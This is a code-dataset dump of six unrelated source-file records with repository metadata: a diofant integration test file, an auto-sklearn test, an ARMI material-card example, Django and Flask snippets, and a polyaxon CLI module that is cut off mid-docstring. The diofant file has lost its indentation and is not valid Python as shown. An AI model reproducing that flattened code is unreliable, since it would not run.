Electric-tric/diofant
|
92c4bf0ef301e5d6f0cfab545b036e1cb7de3c0a
|
[
"BSD-3-Clause"
] | 1 |
2021-08-22T09:34:15.000Z
|
2021-08-22T09:34:15.000Z
|
diofant/tests/integrals/test_heurisch.py
|
Electric-tric/diofant
|
92c4bf0ef301e5d6f0cfab545b036e1cb7de3c0a
|
[
"BSD-3-Clause"
] | null | null | null |
diofant/tests/integrals/test_heurisch.py
|
Electric-tric/diofant
|
92c4bf0ef301e5d6f0cfab545b036e1cb7de3c0a
|
[
"BSD-3-Clause"
] | null | null | null |
import pytest
from diofant import (Add, Derivative, Ei, Eq, Function, I, Integral, LambertW,
Piecewise, Rational, Sum, Symbol, acos, asin, asinh,
besselj, cos, cosh, diff, erf, exp, li, log, pi, ratsimp,
root, simplify, sin, sinh, sqrt, symbols, tan)
from diofant.integrals.heurisch import components, heurisch, heurisch_wrapper
__all__ = ()
x, y, z, nu = symbols('x,y,z,nu')
f = Function('f')
def test_components():
assert components(x*y, x) == {x}
assert components(1/(x + y), x) == {x}
assert components(sin(x), x) == {sin(x), x}
assert components(sin(x)*sqrt(log(x)), x) == \
{log(x), sin(x), sqrt(log(x)), x}
assert components(x*sin(exp(x)*y), x) == \
{sin(y*exp(x)), x, exp(x)}
assert components(x**Rational(17, 54)/sqrt(sin(x)), x) == \
{sin(x), root(x, 54), sqrt(sin(x)), x}
assert components(f(x), x) == \
{x, f(x)}
assert components(Derivative(f(x), x), x) == \
{x, f(x), Derivative(f(x), x)}
assert components(f(x)*diff(f(x), x), x) == \
{x, f(x), Derivative(f(x), x)}
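# components(expr, x) returns the set of sub-expressions heurisch() treats as
# independent building blocks of expr, as exercised above.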
def test_heurisch_polynomials():
assert heurisch(1, x) == x
assert heurisch(x, x) == x**2/2
assert heurisch(x**17, x) == x**18/18
def test_heurisch_fractions():
assert heurisch(1/x, x) == log(x)
assert heurisch(1/(2 + x), x) == log(x + 2)
assert heurisch(1/(x + sin(y)), x) == log(x + sin(y))
# Up to a constant, where C = 5*pi*I/12, Mathematica gives identical
# result in the first case. The difference is because diofant changes
# signs of expressions without any care.
# XXX ^ ^ ^ is this still correct?
assert heurisch(5*x**5/(
2*x**6 - 5), x) in [5*log(2*x**6 - 5) / 12, 5*log(-2*x**6 + 5) / 12]
assert heurisch(5*x**5/(2*x**6 + 5), x) == 5*log(2*x**6 + 5) / 12
assert heurisch(1/x**2, x) == -1/x
assert heurisch(-1/x**5, x) == 1/(4*x**4)
def test_heurisch_log():
assert heurisch(log(x), x) == x*log(x) - x
assert heurisch(log(3*x), x) == -x + x*log(3) + x*log(x)
assert heurisch(log(x**2), x) in [x*log(x**2) - 2*x, 2*x*log(x) - 2*x]
def test_heurisch_exp():
assert heurisch(exp(x), x) == exp(x)
assert heurisch(exp(-x), x) == -exp(-x)
assert heurisch(exp(17*x), x) == exp(17*x) / 17
assert heurisch(x*exp(x), x) == x*exp(x) - exp(x)
assert heurisch(x*exp(x**2), x) == exp(x**2) / 2
assert heurisch(exp(-x**2), x) is None
assert heurisch(2**x, x) == 2**x/log(2)
assert heurisch(x*2**x, x) == x*2**x/log(2) - 2**x*log(2)**(-2)
assert heurisch(Integral(x**z*y, (y, 1, 2), (z, 2, 3)).function, x) == (x*x**z*y)/(z+1)
assert heurisch(Sum(x**z, (z, 1, 2)).function, z) == x**z/log(x)
def test_heurisch_trigonometric():
assert heurisch(sin(x), x) == -cos(x)
assert heurisch(pi*sin(x) + 1, x) == x - pi*cos(x)
assert heurisch(cos(x), x) == sin(x)
assert heurisch(tan(x), x) in [
log(1 + tan(x)**2)/2,
log(tan(x) + I) + I*x,
log(tan(x) - I) - I*x,
]
assert heurisch(sin(x)*sin(y), x) == -cos(x)*sin(y)
assert heurisch(sin(x)*sin(y), y) == -cos(y)*sin(x)
# gives sin(x) in answer when run via setup.py and cos(x) when run via py.test
assert heurisch(sin(x)*cos(x), x) in [sin(x)**2 / 2, -cos(x)**2 / 2]
assert heurisch(cos(x)/sin(x), x) == log(sin(x))
assert heurisch(x*sin(7*x), x) == sin(7*x) / 49 - x*cos(7*x) / 7
assert heurisch(1/pi/4 * x**2*cos(x), x) == 1/pi/4*(x**2*sin(x) -
2*sin(x) + 2*x*cos(x))
assert heurisch(acos(x/4) * asin(x/4), x) == 2*x - (sqrt(16 - x**2))*asin(x/4) \
+ (sqrt(16 - x**2))*acos(x/4) + x*asin(x/4)*acos(x/4)
def test_heurisch_hyperbolic():
assert heurisch(sinh(x), x) == cosh(x)
assert heurisch(cosh(x), x) == sinh(x)
assert heurisch(x*sinh(x), x) == x*cosh(x) - sinh(x)
assert heurisch(x*cosh(x), x) == x*sinh(x) - cosh(x)
assert heurisch(
x*asinh(x/2), x) == x**2*asinh(x/2)/2 + asinh(x/2) - x*sqrt(4 + x**2)/4
def test_heurisch_mixed():
assert heurisch(sin(x)*exp(x), x) == exp(x)*sin(x)/2 - exp(x)*cos(x)/2
def test_heurisch_radicals():
assert heurisch(1/sqrt(x), x) == 2*sqrt(x)
assert heurisch(1/sqrt(x)**3, x) == -2/sqrt(x)
assert heurisch(sqrt(x)**3, x) == 2*sqrt(x)**5/5
assert heurisch(sin(x)*sqrt(cos(x)), x) == -2*sqrt(cos(x))**3/3
y = Symbol('y')
assert heurisch(sin(y*sqrt(x)), x) == 2/y**2*sin(y*sqrt(x)) - \
2*sqrt(x)*cos(y*sqrt(x))/y
assert heurisch_wrapper(sin(y*sqrt(x)), x) == Piecewise(
(0, Eq(y, 0)),
(-2*sqrt(x)*cos(sqrt(x)*y)/y + 2*sin(sqrt(x)*y)/y**2, True))
y = Symbol('y', positive=True)
assert heurisch_wrapper(sin(y*sqrt(x)), x) == 2/y**2*sin(y*sqrt(x)) - \
2*sqrt(x)*cos(y*sqrt(x))/y
def test_heurisch_special():
assert heurisch(erf(x), x) == x*erf(x) + exp(-x**2)/sqrt(pi)
assert heurisch(exp(-x**2)*erf(x), x) == sqrt(pi)*erf(x)**2 / 4
def test_heurisch_symbolic_coeffs():
assert heurisch(1/(x + y), x) == log(x + y)
assert heurisch(1/(x + sqrt(2)), x) == log(x + sqrt(2))
assert simplify(diff(heurisch(log(x + y + z), y), y)) == log(x + y + z)
def test_heurisch_symbolic_coeffs_1130():
y = Symbol('y')
assert heurisch_wrapper(1/(x**2 + y), x) == Piecewise(
(-1/x, Eq(y, 0)),
(-I*log(x - I*sqrt(y))/(2*sqrt(y)) + I*log(x + I*sqrt(y))/(2*sqrt(y)), True))
y = Symbol('y', positive=True)
assert heurisch_wrapper(1/(x**2 + y), x) in [I/sqrt(y)*log(x + sqrt(-y))/2 -
I/sqrt(y)*log(x - sqrt(-y))/2, I*log(x + I*sqrt(y)) /
(2*sqrt(y)) - I*log(x - I*sqrt(y))/(2*sqrt(y))]
def test_heurisch_hacking():
assert (heurisch(sqrt(1 + 7*x**2), x, hints=[]) ==
x*sqrt(1 + 7*x**2)/2 + sqrt(7)*asinh(sqrt(7)*x)/14)
assert (heurisch(sqrt(1 - 7*x**2), x, hints=[]) ==
x*sqrt(1 - 7*x**2)/2 + sqrt(7)*asin(sqrt(7)*x)/14)
assert (heurisch(1/sqrt(1 + 7*x**2), x, hints=[]) ==
sqrt(7)*asinh(sqrt(7)*x)/7)
assert (heurisch(1/sqrt(1 - 7*x**2), x, hints=[]) ==
sqrt(7)*asin(sqrt(7)*x)/7)
assert (heurisch(exp(-7*x**2), x, hints=[]) == sqrt(7*pi)*erf(sqrt(7)*x)/14)
assert heurisch(1/sqrt(9 - 4*x**2), x, hints=[]) == asin(2*x/3)/2
assert heurisch(1/sqrt(9 + 4*x**2), x, hints=[]) == asinh(2*x/3)/2
assert heurisch(li(x), x, hints=[]) == x*li(x) - Ei(2*log(x))
def test_heurisch_function():
assert heurisch(f(x), x) is None
def test_heurisch_wrapper():
f = 1/(y + x)
assert heurisch_wrapper(f, x) == log(x + y)
f = 1/(y - x)
assert heurisch_wrapper(f, x) == -log(x - y)
f = 1/((y - x)*(y + x))
assert heurisch_wrapper(f, x) == \
Piecewise((1/x, Eq(y, 0)), (log(x + y)/2/y - log(x - y)/2/y, True))
# issue sympy/sympy#6926
f = sqrt(x**2/((y - x)*(y + x)))
assert heurisch_wrapper(f, x) == x*sqrt(x**2)*sqrt(1/(-x**2 + y**2)) \
- y**2*sqrt(x**2)*sqrt(1/(-x**2 + y**2))/x
def test_sympyissue_3609():
assert heurisch(1/(x * (1 + log(x)**2)), x) == I*log(log(x) + I)/2 - \
I*log(log(x) - I)/2
# These are examples from the Poor Man's Integrator
# http://www-sop.inria.fr/cafe/Manuel.Bronstein/pmint/examples/
def test_pmint_rat():
# TODO: heurisch() is off by a constant: -3/4. Possibly different permutation
# would give the optimal result?
def drop_const(expr, x):
if expr.is_Add:
return Add(*[arg for arg in expr.args if arg.has(x)])
else:
return expr
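# drop_const strips the x-free terms from a sum, so the assertion below is
# insensitive to whichever integration constant heurisch() happens to pick.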
f = (x**7 - 24*x**4 - 4*x**2 + 8*x - 8)/(x**8 + 6*x**6 + 12*x**4 + 8*x**2)
g = (4 + 8*x**2 + 6*x + 3*x**3)/(x**5 + 4*x**3 + 4*x) + log(x)
assert drop_const(ratsimp(heurisch(f, x)), x) == g
def test_pmint_trig():
f = (x - tan(x)) / tan(x)**2 + tan(x)
g = -x**2/2 - x/tan(x) + log(tan(x)**2 + 1)/2
assert heurisch(f, x) == g
@pytest.mark.slow # 8 seconds on 3.4 GHz
def test_pmint_logexp():
f = (1 + x + x*exp(x))*(x + log(x) + exp(x) - 1)/(x + log(x) + exp(x))**2/x
g = log(x**2 + 2*x*exp(x) + 2*x*log(x) + exp(2*x) + 2*exp(x)*log(x) + log(x)**2)/2 + 1/(x + exp(x) + log(x))
# TODO: Optimal solution is g = 1/(x + log(x) + exp(x)) + log(x + log(x) + exp(x)),
# but Diofant requires a lot of guidance to properly simplify heurisch() output.
assert ratsimp(heurisch(f, x)) == g
@pytest.mark.slow # 8 seconds on 3.4 GHz
def test_pmint_erf():
f = exp(-x**2)*erf(x)/(erf(x)**3 - erf(x)**2 - erf(x) + 1)
g = sqrt(pi)*log(erf(x) - 1)/8 - sqrt(pi)*log(erf(x) + 1)/8 - sqrt(pi)/(4*erf(x) - 4)
assert ratsimp(heurisch(f, x)) == g
def test_pmint_LambertW():
f = LambertW(x)
g = x*LambertW(x) - x + x/LambertW(x)
assert heurisch(f, x) == g
@pytest.mark.xfail
def test_pmint_besselj():
# TODO: in both cases heurisch() gives None. Wrong besselj() derivative?
f = besselj(nu + 1, x)/besselj(nu, x)
g = nu*log(x) - log(besselj(nu, x))
assert simplify(heurisch(f, x) - g) == 0
f = (nu*besselj(nu, x) - x*besselj(nu + 1, x))/x
g = besselj(nu, x)
assert simplify(heurisch(f, x) - g) == 0
@pytest.mark.slow
def test_pmint_WrightOmega():
def omega(x):
return LambertW(exp(x))
f = (1 + omega(x) * (2 + cos(omega(x)) * (x + omega(x))))/(1 + omega(x))/(x + omega(x))
g = log(x + LambertW(exp(x))) + sin(LambertW(exp(x)))
assert heurisch(f, x) == g
def test_RR():
# Make sure the algorithm does the right thing if the ring is RR. See
# issue sympy/sympy#8685.
assert heurisch(sqrt(1 + 0.25*x**2), x, hints=[]) == \
0.5*x*sqrt(0.25*x**2 + 1) + 1.0*asinh(0.5*x)
# TODO: convert the rest of PMINT tests:
# Airy functions
# f = (x - AiryAi(x)*AiryAi(1, x)) / (x**2 - AiryAi(x)**2)
# g = Rational(1,2)*ln(x + AiryAi(x)) + Rational(1,2)*ln(x - AiryAi(x))
# f = x**2 * AiryAi(x)
# g = -AiryAi(x) + AiryAi(1, x)*x
# Whittaker functions
# f = WhittakerW(mu + 1, nu, x) / (WhittakerW(mu, nu, x) * x)
# g = x/2 - mu*ln(x) - ln(WhittakerW(mu, nu, x))
| 34.511864 | 112 | 0.534722 | 1,869 | 10,181 | 2.87801 | 0.107009 | 0.030117 | 0.072504 | 0.023796 | 0.466072 | 0.342443 | 0.232757 | 0.204313 | 0.189812 | 0.138873 | 0 | 0.047576 | 0.232001 | 10,181 | 294 | 113 | 34.629252 | 0.640363 | 0.122778 | 0 | 0.086957 | 0 | 0 | 0.00146 | 0 | 0 | 0 | 0 | 0.003401 | 0.467391 | 1 | 0.141304 | false | 0 | 0.016304 | 0.005435 | 0.173913 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 |
0
| 1 |
7c70c6e774d6a8ca53417d3cc9999e257be28aad
| 1,093 |
py
|
Python
|
test/test_pipeline/components/classification/test_passive_aggressive.py
|
vardaan-raj/auto-sklearn
|
4597152e3a60cd6f6e32719a3bef26e13951b102
|
[
"BSD-3-Clause"
] | 1 |
2021-02-21T16:44:44.000Z
|
2021-02-21T16:44:44.000Z
|
test/test_pipeline/components/classification/test_passive_aggressive.py
|
vardaan-raj/auto-sklearn
|
4597152e3a60cd6f6e32719a3bef26e13951b102
|
[
"BSD-3-Clause"
] | 9 |
2021-02-12T17:52:34.000Z
|
2021-06-26T11:37:41.000Z
|
test/test_pipeline/components/classification/test_passive_aggressive.py
|
vardaan-raj/auto-sklearn
|
4597152e3a60cd6f6e32719a3bef26e13951b102
|
[
"BSD-3-Clause"
] | 1 |
2021-07-06T23:02:42.000Z
|
2021-07-06T23:02:42.000Z
|
import sklearn.linear_model
from autosklearn.pipeline.components.classification.passive_aggressive import \
PassiveAggressive
from .test_base import BaseClassificationComponentTest
class PassiveAggressiveComponentTest(BaseClassificationComponentTest):
__test__ = True
res = dict()
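# Expected per-dataset scores and iteration counts; BaseClassificationComponentTest
# compares fitted results against these fixtures.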
res["default_iris"] = 0.92
res["iris_n_calls"] = 5
res["default_iris_iterative"] = 0.92
res["iris_iterative_n_iter"] = 32
res["default_iris_proba"] = 0.29271032477461295
res["default_iris_sparse"] = 0.4
res["default_digits"] = 0.9156041287188829
res["digits_n_calls"] = 6
res["default_digits_iterative"] = 0.9156041287188829
res["digits_iterative_n_iter"] = 64
res["default_digits_binary"] = 0.9927140255009107
res["default_digits_multilabel"] = 0.90997912489192
res["default_digits_multilabel_proba"] = 1.0
res['ignore_hps'] = ['max_iter']
sk_mod = sklearn.linear_model.PassiveAggressiveClassifier
module = PassiveAggressive
step_hyperparameter = {
'name': 'max_iter',
'value': module.get_max_iter(),
}
| 30.361111 | 79 | 0.725526 | 123 | 1,093 | 6.105691 | 0.447154 | 0.11984 | 0.106525 | 0.026631 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.10989 | 0.167429 | 1,093 | 35 | 80 | 31.228571 | 0.715385 | 0 | 0 | 0 | 0 | 0 | 0.26624 | 0.15279 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0.185185 | 0.111111 | 0 | 0.333333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 |
0
| 1 |
7c79d2fe84aae88ef213fa559ea2499797887d57
| 959 |
py
|
Python
|
doc/gallery-src/analysis/run_blockMcnpMaterialCard.py
|
celikten/armi
|
4e100dd514a59caa9c502bd5a0967fd77fdaf00e
|
[
"Apache-2.0"
] | 1 |
2021-05-29T16:02:31.000Z
|
2021-05-29T16:02:31.000Z
|
doc/gallery-src/analysis/run_blockMcnpMaterialCard.py
|
celikten/armi
|
4e100dd514a59caa9c502bd5a0967fd77fdaf00e
|
[
"Apache-2.0"
] | null | null | null |
doc/gallery-src/analysis/run_blockMcnpMaterialCard.py
|
celikten/armi
|
4e100dd514a59caa9c502bd5a0967fd77fdaf00e
|
[
"Apache-2.0"
] | null | null | null |
"""
Write MCNP Material Cards
=========================
Here we load a test reactor and write each component of one fuel block out as
MCNP material cards.
Normally, code-specific utility code would belong in a code-specific ARMI
plugin. But in this case, the need for MCNP materials cards is so pervasive
that it made it into the framework.
"""
from armi.reactor.tests import test_reactors
from armi.reactor.flags import Flags
from armi.utils.densityTools import formatMaterialCard
from armi.nucDirectory import nuclideBases as nb
from armi import configure
configure(permissive=True)
_o, r = test_reactors.loadTestReactor()
bFuel = r.core.getBlocks(Flags.FUEL)[0]
for ci, component in enumerate(bFuel, start=1):
ndens = component.getNumberDensities()
# convert nucName (str) keys to nuclideBase keys
ndensByBase = {nb.byName[nucName]: dens for nucName, dens in ndens.items()}
print("".join(formatMaterialCard(ndensByBase, matNum=ci)))
| 31.966667 | 79 | 0.755996 | 136 | 959 | 5.308824 | 0.610294 | 0.055402 | 0.047091 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.002436 | 0.1439 | 959 | 29 | 80 | 33.068966 | 0.876979 | 0.402503 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.416667 | 0 | 0.416667 | 0.083333 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
7c7e5ef5e8a7277261b9729c9f251391fd2d29dc
| 1,415 |
py
|
Python
|
apps/goods/views_base.py
|
sunwei19910119/DjangoShop
|
188102dc8ef9f4751f4eeeb7574e95c8cc270484
|
[
"MIT"
] | 3 |
2018-08-22T02:41:55.000Z
|
2022-03-03T08:49:38.000Z
|
apps/goods/views_base.py
|
sunwei19910119/DjangoShop
|
188102dc8ef9f4751f4eeeb7574e95c8cc270484
|
[
"MIT"
] | null | null | null |
apps/goods/views_base.py
|
sunwei19910119/DjangoShop
|
188102dc8ef9f4751f4eeeb7574e95c8cc270484
|
[
"MIT"
] | 1 |
2019-10-23T12:24:08.000Z
|
2019-10-23T12:24:08.000Z
|
# encoding: utf-8
from goods.models import Goods
from django.views.generic.base import View
class GoodsListView(View):
def get(self, request):
"""
Implement the goods list page using a Django class-based View.
"""
json_list = []
goods = Goods.objects.all()[:10]
# for good in goods:
# json_dict = {}
# json_dict["name"] = good.name
# json_dict["category"] = good.category.name
# json_dict["market_price"] = good.market_price
# json_dict["add_time"] = good.add_time
# json_list.append(json_dict)
# from django.http import HttpResponse
# import json
# return HttpResponse(json.dumps(json_list),content_type="application/json")
from django.forms.models import model_to_dict
for good in goods:
json_dict = model_to_dict(good)
json_list.append(json_dict)
import json
from django.core import serializers
json_data = serializers.serialize('json', goods)
json_data = json.loads(json_data)
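# serializers.serialize returns a JSON string; json.loads converts it back to
# Python objects so JsonResponse can serialize the list cleanly.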
from django.http import HttpResponse, JsonResponse
# JsonResponse simply adds the json.dumps call and the content_type header for us
# return HttpResponse(json.dumps(json_data), content_type="application/json")
# If the json.loads call above is commented out, the statement below works fine
# return HttpResponse(json_data, content_type="application/json")
return JsonResponse(json_data, safe=False)
| 32.159091 | 85 | 0.633922 | 159 | 1,415 | 5.45283 | 0.352201 | 0.073818 | 0.076125 | 0.089965 | 0.320646 | 0.129181 | 0 | 0 | 0 | 0 | 0 | 0.002913 | 0.272085 | 1,415 | 43 | 86 | 32.906977 | 0.838835 | 0.424735 | 0 | 0 | 0 | 0 | 0.005175 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.0625 | false | 0 | 0.375 | 0 | 0.5625 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
7c81cc51df1ab53c03a469cdc7c5c3c8cd7e2980
| 508 |
py
|
Python
|
url_shortener/src/__init__.py
|
Andrelpoj/hire.me
|
79428e2094a6b56e762a7f958e1b75f395f59cef
|
[
"Apache-2.0"
] | null | null | null |
url_shortener/src/__init__.py
|
Andrelpoj/hire.me
|
79428e2094a6b56e762a7f958e1b75f395f59cef
|
[
"Apache-2.0"
] | null | null | null |
url_shortener/src/__init__.py
|
Andrelpoj/hire.me
|
79428e2094a6b56e762a7f958e1b75f395f59cef
|
[
"Apache-2.0"
] | null | null | null |
from flask import Flask
from .extensions import db
from .routes import short
from . import config
def create_app():
""" Creates Flask App, connect to Database and register Blueprint of routes"""
app = Flask(__name__)
app.config['SQLALCHEMY_DATABASE_URI'] = config.DATABASE_CONNECTION_URI
app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False
app.app_context().push()
db.init_app(app)
db.create_all()
app.register_blueprint(short)
return app
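# Minimal usage sketch (assumed entry point, not part of this module):
# app = create_app()
# app.run()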
| 28.222222 | 83 | 0.690945 | 64 | 508 | 5.25 | 0.484375 | 0.10119 | 0.113095 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.222441 | 508 | 18 | 84 | 28.222222 | 0.850633 | 0.139764 | 0 | 0 | 0 | 0 | 0.128019 | 0.128019 | 0 | 0 | 0 | 0 | 0 | 1 | 0.076923 | false | 0 | 0.307692 | 0 | 0.461538 | 0.076923 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 |
0
| 1 |
7c82fafc5019f5e066e5d9af9ec1a1742645a993
| 27,180 |
py
|
Python
|
polyaxon_cli/cli/experiment.py
|
tiagopms/polyaxon-cli
|
eb13e3b8389ccf069a421a4dabc87aaa506ab61c
|
[
"MIT"
] | null | null | null |
polyaxon_cli/cli/experiment.py
|
tiagopms/polyaxon-cli
|
eb13e3b8389ccf069a421a4dabc87aaa506ab61c
|
[
"MIT"
] | null | null | null |
polyaxon_cli/cli/experiment.py
|
tiagopms/polyaxon-cli
|
eb13e3b8389ccf069a421a4dabc87aaa506ab61c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
import sys
import click
import rhea
from polyaxon_cli.cli.getters.experiment import (
get_experiment_job_or_local,
get_project_experiment_or_local
)
from polyaxon_cli.cli.upload import upload
from polyaxon_cli.client import PolyaxonClient
from polyaxon_cli.client.exceptions import PolyaxonHTTPError, PolyaxonShouldExitError
from polyaxon_cli.logger import clean_outputs
from polyaxon_cli.managers.experiment import ExperimentManager
from polyaxon_cli.managers.experiment_job import ExperimentJobManager
from polyaxon_cli.utils import cache
from polyaxon_cli.utils.formatting import (
Printer,
dict_tabulate,
get_meta_response,
get_resources,
list_dicts_to_tabulate
)
from polyaxon_cli.utils.log_handler import get_logs_handler
from polyaxon_cli.utils.validation import validate_tags
from polyaxon_client.exceptions import PolyaxonClientException
def get_experiment_details(experiment): # pylint:disable=redefined-outer-name
if experiment.description:
Printer.print_header("Experiment description:")
click.echo('{}\n'.format(experiment.description))
if experiment.resources:
get_resources(experiment.resources.to_dict(), header="Experiment resources:")
if experiment.declarations:
Printer.print_header("Experiment declarations:")
dict_tabulate(experiment.declarations)
if experiment.last_metric:
Printer.print_header("Experiment last metrics:")
dict_tabulate(experiment.last_metric)
response = experiment.to_light_dict(
humanize_values=True,
exclude_attrs=[
'uuid', 'config', 'project', 'experiments', 'description',
'declarations', 'last_metric', 'resources', 'jobs', 'run_env'
])
Printer.print_header("Experiment info:")
dict_tabulate(Printer.add_status_color(response))
@click.group()
@click.option('--project', '-p', type=str, help="The project name, e.g. 'mnist' or 'adam/mnist'.")
@click.option('--experiment', '-xp', type=int, help="The experiment id number.")
@click.pass_context
@clean_outputs
def experiment(ctx, project, experiment): # pylint:disable=redefined-outer-name
"""Commands for experiments."""
ctx.obj = ctx.obj or {}
ctx.obj['project'] = project
ctx.obj['experiment'] = experiment
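# The subcommands below resolve user/project/experiment through
# get_project_experiment_or_local, falling back to the locally cached values
# when the --project/--experiment options are omitted.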
@experiment.command()
@click.option('--job', '-j', type=int, help="The job id.")
@click.pass_context
@clean_outputs
def get(ctx, job):
"""Get experiment or experiment job.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples for getting an experiment:
\b
```bash
$ polyaxon experiment get # if experiment is cached
```
\b
```bash
$ polyaxon experiment --experiment=1 get
```
\b
```bash
$ polyaxon experiment -xp 1 --project=cats-vs-dogs get
```
\b
```bash
$ polyaxon experiment -xp 1 -p alain/cats-vs-dogs get
```
Examples for getting an experiment job:
\b
```bash
$ polyaxon experiment get -j 1 # if experiment is cached
```
\b
```bash
$ polyaxon experiment --experiment=1 get --job=10
```
\b
```bash
$ polyaxon experiment -xp 1 --project=cats-vs-dogs get -j 2
```
\b
```bash
$ polyaxon experiment -xp 1 -p alain/cats-vs-dogs get -j 2
```
"""
def get_experiment():
try:
response = PolyaxonClient().experiment.get_experiment(user, project_name, _experiment)
cache.cache(config_manager=ExperimentManager, response=response)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not load experiment `{}` info.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
get_experiment_details(response)
def get_experiment_job():
try:
response = PolyaxonClient().experiment_job.get_job(user,
project_name,
_experiment,
_job)
cache.cache(config_manager=ExperimentJobManager, response=response)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not get job `{}`.'.format(_job))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
if response.resources:
get_resources(response.resources.to_dict(), header="Job resources:")
response = Printer.add_status_color(response.to_light_dict(
humanize_values=True,
exclude_attrs=['uuid', 'definition', 'experiment', 'unique_name', 'resources']
))
Printer.print_header("Job info:")
dict_tabulate(response)
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
if job:
_job = get_experiment_job_or_local(job)
get_experiment_job()
else:
get_experiment()
@experiment.command()
@click.pass_context
@clean_outputs
def delete(ctx):
"""Delete experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Example:
\b
```bash
$ polyaxon experiment delete
```
"""
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
if not click.confirm("Are sure you want to delete experiment `{}`".format(_experiment)):
click.echo('Existing without deleting experiment.')
sys.exit(1)
try:
response = PolyaxonClient().experiment.delete_experiment(
user, project_name, _experiment)
# Purge caching
ExperimentManager.purge()
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not delete experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
if response.status_code == 204:
Printer.print_success("Experiment `{}` was delete successfully".format(_experiment))
@experiment.command()
@click.option('--name', type=str,
help='Name of the experiment, must be unique within the project, could be none.')
@click.option('--description', type=str, help='Description of the experiment.')
@click.option('--tags', type=str, help='Tags of the experiment, comma separated values.')
@click.pass_context
@clean_outputs
def update(ctx, name, description, tags):
"""Update experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment -xp 2 update --description="new description for my experiments"
```
\b
```bash
$ polyaxon experiment -xp 2 update --tags="foo, bar" --name="unique-name"
```
"""
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
update_dict = {}
if name:
update_dict['name'] = name
if description:
update_dict['description'] = description
tags = validate_tags(tags)
if tags:
update_dict['tags'] = tags
if not update_dict:
Printer.print_warning('No argument was provided to update the experiment.')
sys.exit(0)
try:
response = PolyaxonClient().experiment.update_experiment(
user, project_name, _experiment, update_dict)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not update experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
Printer.print_success("Experiment updated.")
get_experiment_details(response)
@experiment.command()
@click.option('--yes', '-y', is_flag=True, default=False,
help="Automatic yes to prompts. "
"Assume \"yes\" as answer to all prompts and run non-interactively.")
@click.pass_context
@clean_outputs
def stop(ctx, yes):
"""Stop experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
$ polyaxon experiment stop
```
\b
```bash
$ polyaxon experiment -xp 2 stop
```
"""
user, project_name, _experiment = get_project_experiment_or_local(ctx.obj.get('project'),
ctx.obj.get('experiment'))
if not yes and not click.confirm("Are sure you want to stop "
"experiment `{}`".format(_experiment)):
click.echo('Existing without stopping experiment.')
sys.exit(0)
try:
PolyaxonClient().experiment.stop(user, project_name, _experiment)
except (PolyaxonHTTPError, PolyaxonShouldExitError, PolyaxonClientException) as e:
Printer.print_error('Could not stop experiment `{}`.'.format(_experiment))
Printer.print_error('Error message `{}`.'.format(e))
sys.exit(1)
Printer.print_success("Experiment is being stopped.")
@experiment.command()
@click.option('--copy', '-c', is_flag=True, default=False,
help="To copy the experiment before restarting.")
@click.option('--file', '-f', multiple=True, type=click.Path(exists=True),
help="The polyaxon files to update with.")
@click.option('-u', is_flag=True, default=False,
help="To upload the repo before restarting.")
@click.pass_context
@clean_outputs
def restart(ctx, copy, file, u): # pylint:disable=redefined-builtin
"""Restart experiment.
Uses [Caching](/references/polyaxon-cli/#caching)
Examples:
\b
```bash
